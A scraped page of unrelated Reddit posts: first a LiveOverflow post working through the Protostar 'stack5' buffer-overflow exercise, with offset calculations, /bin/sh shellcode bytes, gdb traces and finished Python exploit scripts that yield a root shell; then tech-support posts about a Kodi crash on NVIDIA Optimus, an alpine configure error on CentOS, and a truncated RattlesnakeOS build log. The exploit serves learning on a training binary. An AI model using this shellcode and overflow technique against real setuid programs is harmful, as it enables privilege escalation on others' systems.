---Reminder------------------------------------------------------- RET EBP : 0xbffff7b8: 0xbffff838 RET EIP : 0xbffff7bc: 0xb7eadc76 buffer start adress: 0xbffff770 ----------------------------------------------------------------- 
Let's do some computation to overwrite EIP
# EIP's address - buffer's address # gdb$ p/d 0xbffff7bc - 0xbffff770 # $1 = 0x76 
We need 76 bytes then we can start to overwrite EIP ( + 4 byte for EIP )
python -c 'print "A"*72 + "BBBB" + "CCCC"' AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC 
A is Padding B is EBP C is EIP

Let's try our buffer overflow !
./stack5 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC dmesg [50576.044013] stack5[13898]: segfault at 43434343 ip 43434343 sp bffff7e0 error 4 
EIP has been overwritten and it is working fine (43 in ASCII => 'C') !

Shellcode Exploitation
We will use a well known and working shellcode :
https://security.stackexchange.com/questions/73878/program-exiting-after-executing-int-0x80-instruction-when-running-shellcode
shellcode is 58 bytes. We will construct our payload like that:
5 (NOP) + 58 (Shellcode) + 9 (PADDING-NOP) + 4 (EBP) + 4 (EIP) = 76 + 4 EIP bytes as computed 
Important : here I put the shellcode IN the buffer
r <<< $(python -c 'print "\x90"*5 + "\x83\xc4\x10\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" + "\x90"*9 + "\x38\xf8\xff\xbf" + "\x70\xf7\xff\xbf"') 
\x38\xf8\xff\xbf = EBP original adress = 0xbffff838
\x70\xf7\xff\xbf = overwritten EIP= buffer start adress = 0xbffff770

In GDB break juste before the ret instruction and check esp to be sure it will jump where we want
gdb$ x/wx $esp 0xbffff7bc: 0xbffff770 
Well this good for the next eip adress ! check to see if our shellcode is always there
x/30i 0xbffff770 0xbffff770: nop 0xbffff771: nop 0xbffff772: nop 0xbffff773: nop 0xbffff774: nop 0xbffff775: add esp,0x10 0xbffff778: xor eax,eax 0xbffff77a: xor ebx,ebx 0xbffff77c: mov al,0x6 0xbffff77e: int 0x80 0xbffff780: push ebx 0xbffff781: push 0x7974742f 0xbffff786: push 0x7665642f 0xbffff78b: mov ebx,esp 0xbffff78d: xor ecx,ecx 0xbffff78f: mov cx,0x2712 0xbffff793: mov al,0x5 0xbffff795: int 0x80 0xbffff797: xor eax,eax 0xbffff799: push eax 0xbffff79a: push 0x68732f2f 0xbffff79f: push 0x6e69622f 0xbffff7a4: mov ebx,esp 0xbffff7a6: push eax 0xbffff7a7: push ebx 0xbffff7a8: mov ecx,esp 0xbffff7aa: cdq 0xbffff7ab: mov al,0xb 0xbffff7ad: int 0x80 0xbffff7af: nop 
On GDB Perfect it is working !
gdb$ c Executing new program: /bin/dash $ 
out of GDB it is NOT working anymore:
same payload than in gdb
(python -c "import sys; sys.stdout.write('\x90'*5 + '\x83\xc4\x10\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80' + '\x90'*9 + '\x38\xf8\xff\xbf' + '\x70\xf7\xff\xbf')";) | ./stack5 
or (overwrite EBP)
(python -c "import sys; sys.stdout.write('\x90'*5 + '\x83\xc4\x10\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80' + '\x90'*13 + '\x70\xf7\xff\xbf')";) | ./stack5 
The only thing I get : Illegal instruction! Here a strace if it can help ...
execve("./stack5", ["./stack5"], [/* 16 vars */]) = 0 brk(0) = 0x804a000 fcntl64(0, F_GETFD) = 0 fcntl64(1, F_GETFD) = 0 fcntl64(2, F_GETFD) = 0 access("/etc/suid-debug", F_OK) = -1 ENOENT (No such file or directory) access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory) mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fe0000 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory) open("/etc/ld.so.cache", O_RDONLY) = 3 fstat64(3, {st_mode=S_IFREG|0644, st_size=13796, ...}) = 0 mmap2(NULL, 13796, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7fdc000 close(3) = 0 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory) open("/lib/libc.so.6", O_RDONLY) = 3 read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\320m\1\0004\0\0\0"..., 512) = 512 fstat64(3, {st_mode=S_IFREG|0755, st_size=1319176, ...}) = 0 mmap2(NULL, 1329480, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb7e97000 mprotect(0xb7fd5000, 4096, PROT_NONE) = 0 mmap2(0xb7fd6000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x13e) = 0xb7fd6000 mmap2(0xb7fd9000, 10568, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7fd9000 close(3) = 0 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7e96000 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7e966c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0 mprotect(0xb7fd6000, 8192, PROT_READ) = 0 mprotect(0xb7ffe000, 4096, PROT_READ) = 0 munmap(0xb7fdc000, 13796) = 0 fstat64(0, {st_mode=S_IFIFO|0600, st_size=0, ...}) = 0 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fdf000 read(0, "\220\220\220\220\220\203\304\0201\3001\333\260\6\315\200Sh/ttyh/dev\211\3431\311f"..., 4096) = 80 read(0, "", 4096) = 0 --- SIGILL (Illegal instruction) @ 0 (0) --- +++ killed by SIGILL +++ Illegal instruction 
Questions / Others informations
I know there could be some adress change caused by ENVs vars but I do not think that is the problem... but I have no evidence.

Just for the exemple Shellcode After EIP (outside the buffer) : everything is OK
[email protected]:/opt/protostabin$ (python -c "import sys; sys.stdout.write('\x90'*76 + '\xc0\xf7\xff\xbf' + '90'*10 + '\x83\xc4\x10\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80')";) | ./stack5 # whoami root 

EDIT :
I add python script exploit for reference :

Shellcode inside the buffer (not working)
import struct totalpad = 76 # Total bytes needed to start overwriting EIP NOP = "\x90" * 5 shellcode = "\x83\xc4\x10\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" EIP = struct.pack("I", 0xbffff770) nbpad = totalpad - len(NOP) - len(shellcode) PAD = 'A' * nbpad print NOP + shellcode + PAD + EIP 
Shellcode outside the buffer (working good)
import struct NOP1 = "\x90" * 76 EIP = struct.pack("I", 0xbffff7c0) NOP2 = "\x90" * 10 shellcode = "\x83\xc4\x10\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" print NOP1 + EIP + NOP2 + shellcode 
EDIT : shellcode inside the buffer is now working :-)
When executing outside gdb and attaching to the process I see that the start of the buffer is located at another memory adress.
So instead of hardcoding EIP start of buffer I use a register to jump to.
Hopefully there is one that hold the good adress: eax
Here is the working exploit of Shellcode inside the buffer:
import struct totalpad = 76 # Total bytes needed to start overwriting EIP # Little NOP Slide NOP = "\x90" * 2 # Shellcode maintaing / reopening stdin (for gets exploitation) shellcode = "\x83\xc4\x10\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" # Buffer start adress is 0xbfff770 but to hardcode adress is unreliable # EIP = struct.pack("I", 0xbffff770) # We will use a register to jump on the start of the buffer # We know debugging the program that eax contain the adress we want # We look with objdump -D stack5 -M intel | grep call | grep eax # 80483bf: ff d0 call eax # 804846b: ff d0 call eax # We have to adress that will call eax so that can trigger our exploit ! # EIP will call the adress that will "call eax" EIP = struct.pack("I", 0x80483bf) # We let EBP option either to rewrite trash or to use its original adress EBP = struct.pack("I", 0xbfff7b8) #EBP = "BBBB" nbpad = totalpad - len(NOP) - len(shellcode) - len(EBP) PAD = 'A' * nbpad # our payload print NOP + shellcode + PAD + EBP + EIP 
Usage :
$ python /home/usepython_exploits/stack5_inside_buffer.py | /opt/protostabin/stack5 # whoami root 
Stéphane
submitted by tequilaweb81 to LiveOverflow [link] [comments]

Kodi "GPU at BusId 0x1 doesn't have a supported video decoder" workaround?

I use a bash script that makes xrandr output to my integrated display using nvidia. (I've used this guide Glorious Eggroll Arch NVIDIA Prime) I guess GM108M doesn't have a video decoder but I am able to watch videos on my computer still, even though I use my NVIDIA GPU at all times. Is there any sort of workaround to launch up Kodi? The following are my GPUs, my bash script, Xorg config, Kodi output, and crash log.
> lspci -nn | grep NVIDIA 01:00.0 3D controller [0302]: NVIDIA Corporation GM108M [GeForce 930M] [10de:1346] (rev a2) 

> lspci -k | grep -A 2 -E "(VGA|3D)" 00:02.0 VGA compatible controller: Intel Corporation Skylake GT2 [HD Graphics 520] (rev 07) Subsystem: Toshiba Corporation Skylake GT2 [HD Graphics 520] Kernel driver in use: i915 -- 01:00.0 3D controller: NVIDIA Corporation GM108M [GeForce 930M] (rev a2) Subsystem: Toshiba Corporation GM108M [GeForce 930M] Kernel driver in use: nvidia 

> cat /etc/X11/xorg.conf Section "Module" Load "modesetting" EndSection Section "Device" Identifier "nvidia" Driver "nvidia" BusID "PCI:1:0:0" Option "AllowEmptyInitialConfiguration" EndSection 

> cat /etc/X11/xinit/xinitrc.d/nvidia-script.sh #!/bin/sh xrandr --setprovideroutputsource modesetting NVIDIA-0 xrandr --auto 

> kodi GPU at BusId 0x1 doesn't have a supported video decoder /usbin/kodi: line 219: 1996 Floating point exception(core dumped) ${KODI_BINARY} $SAVED_ARGS Crash report available at /[ehem]/[ehem]/kodi_crashlog-20200419_232209.log 

> cat /[ehem]/[ehem]/kodi_crashlog-20200419_232209.log ############## Kodi CRASH LOG ############### ################ SYSTEM INFO ################ Date: Sun 19 Apr 2020 11:22:09 PM +03 Kodi Options: Arch: x86_64 Kernel: Linux 5.6.3-arch1-1 #1 SMP PREEMPT Wed, 08 Apr 2020 07:47:16 +0000 Release: Arch Linux ############## END SYSTEM INFO ############## ############### STACK TRACE ################# gdb not installed, can't get stack trace. ############# END STACK TRACE ############### ################# LOG FILE ################## 2020-04-19 23:22:08.246 T:140197124628672 NOTICE: ----------------------------------------------------------------------- 2020-04-19 23:22:08.246 T:140197124628672 NOTICE: Starting Kodi (18.6 Git:20200229-nogitfound). Platform: Linux x86 64-bit 2020-04-19 23:22:08.246 T:140197124628672 NOTICE: Using Release Kodi x64 build 2020-04-19 23:22:08.246 T:140197124628672 NOTICE: Kodi compiled 2020-02-29 by GCC 9.2.1 for Linux x86 64-bit version 5.4.17 (328721) 2020-04-19 23:22:08.246 T:140197124628672 NOTICE: Running on Arch Linux rolling, kernel: Linux x86 64-bit version 5.6.3-arch1-1 2020-04-19 23:22:08.246 T:140197124628672 NOTICE: FFmpeg version/source: 4.0.4-Kodi 2020-04-19 23:22:08.246 T:140197124628672 NOTICE: Host CPU: Intel(R) Core(TM) i7-6500U CPU @ 2.50GHz, 4 cores available 2020-04-19 23:22:08.246 T:140197124628672 NOTICE: special://xbmc/ is mapped to: /usshare/kodi 2020-04-19 23:22:08.246 T:140197124628672 NOTICE: special://xbmcbin/ is mapped to: /uslib/kodi 2020-04-19 23:22:08.246 T:140197124628672 NOTICE: special://xbmcbinaddons/ is mapped to: /uslib/kodi/addons 2020-04-19 23:22:08.246 T:140197124628672 NOTICE: special://masterprofile/ is mapped to: /[ehem]/[ehem]/.kodi/userdata 2020-04-19 23:22:08.246 T:140197124628672 NOTICE: special://envhome/ is mapped to: /[ehem]/[ehem] 2020-04-19 23:22:08.246 T:140197124628672 NOTICE: special://home/ is mapped to: /[ehem]/[ehem]/.kodi 2020-04-19 23:22:08.246 T:140197124628672 NOTICE: special://temp/ is mapped to: /[ehem]/[ehem]/.kodi/temp 2020-04-19 23:22:08.246 T:140197124628672 NOTICE: special://logpath/ is mapped to: /[ehem]/[ehem]/.kodi/temp 2020-04-19 23:22:08.246 T:140197124628672 NOTICE: The executable running is: /uslib/kodi/kodi-x11 2020-04-19 23:22:08.246 T:140197124628672 NOTICE: Local hostname: tardis 2020-04-19 23:22:08.246 T:140197124628672 NOTICE: Log File is located: /[ehem]/[ehem]/.kodi/temp/kodi.log 2020-04-19 23:22:08.246 T:140197124628672 NOTICE: ----------------------------------------------------------------------- 2020-04-19 23:22:08.246 T:140197124628672 INFO: loading settings 2020-04-19 23:22:08.246 T:140197124628672 NOTICE: special://profile/ is mapped to: special://masterprofile/ 2020-04-19 23:22:08.252 T:140197124628672 DEBUG: CSkinSettings: no  tag found 2020-04-19 23:22:08.252 T:140197124628672 NOTICE: No settings file to load (special://xbmc/system/advancedsettings.xml) 2020-04-19 23:22:08.252 T:140197124628672 NOTICE: No settings file to load (special://masterprofile/advancedsettings.xml) 2020-04-19 23:22:08.252 T:140197124628672 NOTICE: Default Video Player: VideoPlayer 2020-04-19 23:22:08.252 T:140197124628672 NOTICE: Default Audio Player: paplayer 2020-04-19 23:22:08.252 T:140197124628672 NOTICE: Disabled debug logging due to GUI setting. Level 0. 2020-04-19 23:22:08.252 T:140197124628672 NOTICE: Log level changed to "LOG_LEVEL_NORMAL" 2020-04-19 20:22:08.257 T:140197124628672 NOTICE: PulseAudio: Server found running - will try to use Pulse 2020-04-19 20:22:08.258 T:140197124628672 NOTICE: Running database version Addons27 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: audioencoder.kodi.builtin.aac v1.0.0 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: audioencoder.kodi.builtin.wma v1.0.0 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: game.controller.default v1.0.8 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: game.controller.snes v1.0.8 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: kodi.binary.global.audioengine v1.0.1 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: kodi.binary.global.filesystem v1.0.2 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: kodi.binary.global.general v1.0.3 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: kodi.binary.global.gui v5.12.0 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: kodi.binary.global.main v1.0.14 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: kodi.binary.global.network v1.0.0 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: kodi.binary.instance.audiodecoder v2.0.0 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: kodi.binary.instance.audioencoder v2.0.0 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: kodi.binary.instance.game v1.1.0 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: kodi.binary.instance.imagedecoder v2.0.0 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: kodi.binary.instance.inputstream v2.0.8 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: kodi.binary.instance.peripheral v1.3.7 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: kodi.binary.instance.pvr v5.10.3 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: kodi.binary.instance.screensaver v2.0.0 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: kodi.binary.instance.vfs v2.0.0 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: kodi.binary.instance.videocodec v1.0.1 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: kodi.binary.instance.visualization v2.0.1 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: kodi.resource v1.0.0 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: metadata.album.universal v3.1.1 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: metadata.artists.universal v4.3.0 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: metadata.common.allmusic.com v3.2.0 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: metadata.common.fanart.tv v3.6.1 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: metadata.common.imdb.com v3.1.4 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: metadata.common.musicbrainz.org v2.2.1 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: metadata.common.theaudiodb.com v2.0.2 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: metadata.common.themoviedb.org v3.1.9 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: metadata.local v1.0.0 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: metadata.themoviedb.org v5.1.7 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: metadata.tvshows.themoviedb.org v3.1.0 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: repository.xbmc.org v3.1.6 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: resource.images.weathericons.default v1.1.8 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: resource.language.en_gb v2.0.1 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: resource.uisounds.kodi v1.0.0 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: screensaver.xbmc.builtin.black v1.0.33 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: screensaver.xbmc.builtin.dim v1.0.59 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: script.module.pil v1.1.7 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: script.module.pycryptodome v3.4.3 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: service.xbmc.versioncheck v0.4.6 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: skin.estouchy v2.0.28 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: skin.estuary v2.0.27 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: webinterface.default v18.x-2.4.6 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: xbmc.addon v18.6.0 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: xbmc.core v0.1.0 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: xbmc.gui v5.14.0 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: xbmc.json v10.3.0 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: xbmc.metadata v2.1.0 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: xbmc.python v2.26.0 installed 2020-04-19 20:22:08.262 T:140197124628672 NOTICE: ADDON: xbmc.webinterface v1.0.0 installed 2020-04-19 20:22:08.282 T:140197124628672 ERROR: DBus error: org.freedesktop.DBus.Error.InvalidArgs - No such property “OnLowBattery” 2020-04-19 20:22:08.284 T:140197107828480 WARNING: Pulseaudio module module-allow-passthrough not loaded - opening PT devices might fail 2020-04-19 20:22:08.285 T:140197107828480 NOTICE: Found 1 Lists of Devices 2020-04-19 20:22:08.285 T:140197107828480 NOTICE: Enumerated PULSE devices: 2020-04-19 20:22:08.285 T:140197107828480 NOTICE: Device 1 2020-04-19 20:22:08.285 T:140197107828480 NOTICE: m_deviceName : Default 2020-04-19 20:22:08.285 T:140197107828480 NOTICE: m_displayName : Default 2020-04-19 20:22:08.285 T:140197107828480 NOTICE: m_displayNameExtra: Default Output Device (PULSEAUDIO) 2020-04-19 20:22:08.285 T:140197107828480 NOTICE: m_deviceType : AE_DEVTYPE_PCM 2020-04-19 20:22:08.285 T:140197107828480 NOTICE: m_channels : FL, FR 2020-04-19 20:22:08.285 T:140197107828480 NOTICE: m_sampleRates : 5512,8000,11025,16000,22050,32000,44100,48000,64000,88200,96000,176400,192000,384000 2020-04-19 20:22:08.285 T:140197107828480 NOTICE: m_dataFormats : AE_FMT_U8,AE_FMT_S16NE,AE_FMT_S24NE3,AE_FMT_S24NE4,AE_FMT_S32NE,AE_FMT_FLOAT 2020-04-19 20:22:08.285 T:140197107828480 NOTICE: m_streamTypes : No passthrough capabilities 2020-04-19 20:22:08.285 T:140197107828480 NOTICE: Device 2 2020-04-19 20:22:08.285 T:140197107828480 NOTICE: m_deviceName : alsa_output.pci-0000_00_1f.3.analog-stereo 2020-04-19 20:22:08.285 T:140197107828480 NOTICE: m_displayName : Built-in Audio Analog Stereo 2020-04-19 20:22:08.285 T:140197107828480 NOTICE: m_displayNameExtra: Speakers (PULSEAUDIO) 2020-04-19 20:22:08.285 T:140197107828480 NOTICE: m_deviceType : AE_DEVTYPE_PCM 2020-04-19 20:22:08.285 T:140197107828480 NOTICE: m_channels : FL, FR 2020-04-19 20:22:08.285 T:140197107828480 NOTICE: m_sampleRates : 5512,8000,11025,16000,22050,32000,44100,48000,64000,88200,96000,176400,192000,384000 2020-04-19 20:22:08.285 T:140197107828480 NOTICE: m_dataFormats : AE_FMT_U8,AE_FMT_S16NE,AE_FMT_S24NE3,AE_FMT_S24NE4,AE_FMT_S32NE,AE_FMT_FLOAT 2020-04-19 20:22:08.285 T:140197107828480 NOTICE: m_streamTypes : No passthrough capabilities 2020-04-19 20:22:08.286 T:140197099435776 NOTICE: PulseAudio: Opened device Default in pcm mode with Buffersize 150 ms 2020-04-19 20:22:08.483 T:140197124628672 NOTICE: Checking resolution 16 2020-04-19 20:22:08.545 T:140197124628672 NOTICE: Using visual 0x21 ############### END LOG FILE ################ ############ END Kodi CRASH LOG ############# 
Thanks a lot, guys.
submitted by aembra to techsupport [link] [comments]

I'm trying to make an RPM for alpine 2.21 for CentOS 8

I'm trying to make an RPM for alpine 2.21 for CentOS 8 since one doesn't seem to exist already. Here is the issue I'm running into:
[[email protected] alpine-2.21]# ./configure
checking for a BSD-compatible install... /usbin/install -c
checking whether build environment is sane... yes
checking for a thread-safe mkdir -p... /usbin/mkdir -p
checking for gawk... gawk
checking whether make sets $(MAKE)... yes
checking whether make supports nested variables... yes
checking whether to enable maintainer-specific portions of Makefiles... no
checking build system type... x86_64-unknown-linux-gnu
checking host system type... x86_64-unknown-linux-gnu
configure: Configuring for alpine 2.21 (x86_64-unknown-linux-gnu))
checking for gcc... gcc
checking whether the C compiler works... yes
checking for C compiler default output file name... a.out
checking for suffix of executables...
checking whether we are cross compiling... no
checking for suffix of object files... o
checking whether we are using the GNU C compiler... yes
checking whether gcc accepts -g... yes
checking for gcc option to accept ISO C89... none needed
checking whether gcc understands -c and -o together... yes
checking for style of include used by make... GNU
checking dependency style of gcc... gcc3
checking for gcc option to accept ISO C99... none needed
checking for gcc option to accept ISO Standard C... (cached) none needed
checking whether make sets $(MAKE)... (cached) yes
checking whether ln -s works... yes
checking for gawk... (cached) gawk
checking for ranlib... ranlib
checking how to print strings... printf
checking for a sed that does not truncate output... /usbin/sed
checking for grep that handles long lines and -e... /usbin/grep
checking for egrep... /usbin/grep -E
checking for fgrep... /usbin/grep -F
checking for ld used by gcc... /usbin/ld
checking if the linker (/usbin/ld) is GNU ld... yes
checking for BSD- or MS-compatible name lister (nm)... /usbin/nm -B
checking the name lister (/usbin/nm -B) interface... BSD nm
checking the maximum length of command line arguments... 1572864
checking how to convert x86_64-unknown-linux-gnu file names to x86_64-unknown-linux-gnu format... func_convert_file_noop
checking how to convert x86_64-unknown-linux-gnu file names to toolchain format... func_convert_file_noop
checking for /usbin/ld option to reload object files... -r
checking for objdump... objdump
checking how to recognize dependent libraries... pass_all
checking for dlltool... no
checking how to associate runtime and link libraries... printf %s\n
checking for ar... ar
checking for archiver u/FILE support... @
checking for strip... strip
checking for ranlib... (cached) ranlib
checking command to parse /usbin/nm -B output from gcc object... ok
checking for sysroot... no
checking for a working dd... /usbin/dd
checking how to truncate binary pipes... /usbin/dd bs=4096 count=1
checking for mt... no
checking if : is a manifest tool... no
checking how to run the C preprocessor... gcc -E
checking for ANSI C header files... yes
checking for sys/types.h... yes
checking for sys/stat.h... yes
checking for stdlib.h... yes
checking for string.h... yes
checking for memory.h... yes
checking for strings.h... yes
checking for inttypes.h... yes
checking for stdint.h... yes
checking for unistd.h... yes
checking for dlfcn.h... yes
checking for objdir... .libs
checking if gcc supports -fno-rtti -fno-exceptions... no
checking for gcc option to produce PIC... -fPIC -DPIC
checking if gcc PIC flag -fPIC -DPIC works... yes
checking if gcc static flag -static works... no
checking if gcc supports -c -o file.o... yes
checking if gcc supports -c -o file.o... (cached) yes
checking whether the gcc linker (/usbin/ld -m elf_x86_64) supports shared libraries... yes
checking whether -lc should be explicitly linked in... no
checking dynamic linker characteristics... GNU/Linux ld.so
checking how to hardcode library paths into programs... immediate
checking whether stripping libraries is possible... yes
checking if libtool supports shared libraries... yes
checking whether to build shared libraries... yes
checking whether to build static libraries... yes
checking for ar... /usbin/ar
checking for rm... /usbin/rm
checking for cp... /usbin/cp
checking for ln... /usbin/ln
checking for ls... /usbin/ls
checking for sed... (cached) /usbin/sed
checking for make... /usbin/make
checking whether NLS is requested... yes
checking for msgfmt... /usbin/msgfmt
checking for gmsgfmt... /usbin/msgfmt
checking for xgettext... /usbin/xgettext
checking for msgmerge... /usbin/msgmerge
checking for ld used by GCC... /usbin/ld -m elf_x86_64
checking if the linker (/usbin/ld -m elf_x86_64) is GNU ld... yes
checking for shared library run path origin... done
checking for CFPreferencesCopyAppValue... no
checking for CFLocaleCopyCurrent... no
checking for GNU gettext in libc... yes
checking whether to use NLS... yes
checking where the gettext function comes from... libc
checking option: dmalloc enabled... no
checking option: debugging is enabled... yes
checking option: optimization is enabled... yes
checking option: mouse support enabled... yes
checking option: quotas enabled... no
checking option: From changing enabled... yes
checking option: background post enabled... yes
checking option: keyboard lock enabled... yes
checking option: from encoding enabled... no
checking for sendmail... /ussbin/sendmail
checking for inews... no
checking for passwd... /usbin/passwd
checking for hunspell... hunspell
checking for hunspell... /usbin/hunspell
checking for hunspell... hunspell
checking for hunspell... /usbin/hunspell
checking for setupterm in -ltinfo... no
checking for setupterm in -lncurses... no
checking for setupterm in -lcurses... no
checking for tgetent in -ltermlib... no
checking for tgetent in -ltermcap... no
configure: error: Terminfo/termcap not found
[[email protected] alpine-2.21]#

So, it appears that it can't find termcap. I can run the "man termcap" and see it fine. I'm unclear on what I need to do in order to modify the configure script to point to the right one, since I don't know what package or library termcap is included in.
Any hints on where to look would be appreciated.
Thanks
submitted by mstaver to CentOS [link] [comments]

What's the problem in this build ?

I'm trying to include magisk in it, using https://github.com/bencejuhaasz/rattlesnakeos_scripts
the log is:
RattlesnakeOS Build FAILED Device: marlin Stack Name: rattlesnakeos-marlin-2xahh8bwsn Stack Version: 10.0.3 Stack Region: us-east-1 Release Channel: marlin-stable Instance Type: c5.4xlarge Instance Region: us-east-2 Instance IP: 13.59.91.143 Build Date: 2020.02.20.07 Elapsed Time: 1hrs 41min 5sec AOSP Build: QP1A.191005.007.A3 AOSP Branch: android-10.0.0_r17 Chromium Version: 80.0.3987.117 F-Droid Version: 1.8-alpha2 F-Droid Priv Extension Version: 0.2.11 Build Reason: No build is required, but IGNORE_VERSION_CHECKS=true ncluding test/vts/testcases/codelab/host_multi_hal/Android.mk ... [ 92% 404/439] including test/vts/testcases/codelab/target_binary/Android.mk ... [ 92% 405/439] including test/vts/testcases/host/camera_its/Android.mk ... [ 92% 406/439] including test/vts/testcases/host/fastboot/Android.mk ... [ 92% 407/439] including test/vts/testcases/host/fmq_hidl_test/Android.mk ... [ 92% 408/439] including test/vts/testcases/host/reboot/RebootRootRemountTest/Android.mk ... [ 93% 409/439] including test/vts/testcases/host/reboot/RebootTest/Android.mk ... [ 93% 410/439] including 